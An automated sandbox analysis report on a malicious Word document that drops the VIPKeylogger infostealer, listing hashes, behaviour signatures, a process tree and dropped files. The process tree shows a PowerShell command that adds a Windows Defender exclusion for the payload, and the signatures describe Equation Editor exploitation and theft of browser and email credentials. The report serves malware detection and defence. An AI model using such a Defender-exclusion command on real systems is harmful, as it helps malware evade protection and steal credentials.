Analysis

  • max time kernel
    132s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 11:41

General

  • Target

    30092463687563.docx

  • Size

    264KB

  • MD5

    da3b3b9590907c35f64e830b2b244ffd

  • SHA1

    8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1

  • SHA256

    97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825

  • SHA512

    98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1

  • SSDEEP

    6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1824
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
        "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
          "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2568

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      68988d7dd981fa3061f0b32c8627c1ec

      SHA1

      0800a2e4506ba3568047417e440cbf5a21fe8a5c

      SHA256

      7040d17da449308cf2460522e5495ddaffea8edd787b2be52aa15eae552c478c

      SHA512

      1b6fefaf0fb9c5a4858ba6199dc33262409dcbd07a87c8c5c2ab7370f28b1ea34dea5622551a53d45565d1c7d445882390a41e9896aeba3e3d68e003bb63747f

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{96E47E6C-170C-4C3F-98E1-D8B9A741D571}.FSD

      Filesize

      128KB

      MD5

      7d9680f56b3377f37e05ca9b7683f43e

      SHA1

      63c7960b2cc93379aaf9e92799664ab60729d172

      SHA256

      b91e1013b2113fe1875a1bb44c962db3756d369160b36f0e4cdda1ce70211024

      SHA512

      073a47bf49442efcfd3d41833292d0257dee8103be89255577169335d5381788c7aef30febcf5ee9ab207dee4fb9e864f9408776960b0b65cd51b120e01adfdf

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\wealthzxcv[1].doc

      Filesize

      565KB

      MD5

      adbffccbb78834fa492cc7ca8a676e52

      SHA1

      1e5b065d13fa03fb556a7ff315b85db96d369908

      SHA256

      42d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63

      SHA512

      de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33

    • C:\Users\Admin\AppData\Local\Temp\{5A2B2299-D02A-4F34-8FA6-5E382910A6BE}

      Filesize

      128KB

      MD5

      afa493144346c84ef2d518ebe8930309

      SHA1

      949d73a0a801d92c04f015df239e9719a62108df

      SHA256

      c987711c23a13fe6f2879edf218f2b88a565edf88372958178d755f54a830b3d

      SHA512

      f03c4f097e59935a41dd464c947302acdbc801f2f5ff279283cf0ed5872fdcb2f7b846af7c40875fbace7cb53c8ee344d3b5279da3bd25213ef887788bb32da0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      412B

      MD5

      64c0da6e5a63888d9890912acced0309

      SHA1

      20151576c22d2469553f31d5f882a0f749800ca4

      SHA256

      ecbb43b054e8615b8227e5317d92c7edec0d87de76294c7c61d4175d7dec8f13

      SHA512

      115e97bd2c6a5decd4be01b608844f0d92c1c02c5b3d6afcc0802adda09d33c4d1b3a7482cfa96fbbbce818352e4f3864627d0b3a49544c409b3b407a2cd30d0

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • C:\Users\Admin\AppData\Roaming\wealtken20309.exe

      Filesize

      858KB

      MD5

      d237ebe34f35a9ffe99f5efe0474c1e2

      SHA1

      573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1

      SHA256

      ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137

      SHA512

      9393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05

    • memory/2004-96-0x0000000000270000-0x000000000028E000-memory.dmp

      Filesize

      120KB

    • memory/2004-94-0x00000000010D0000-0x00000000011AC000-memory.dmp

      Filesize

      880KB

    • memory/2004-104-0x0000000000440000-0x00000000004CA000-memory.dmp

      Filesize

      552KB

    • memory/2252-2-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2252-0-0x000000002F381000-0x000000002F382000-memory.dmp

      Filesize

      4KB

    • memory/2252-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2252-103-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2568-105-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-118-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-116-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-114-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2568-111-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-109-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-107-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB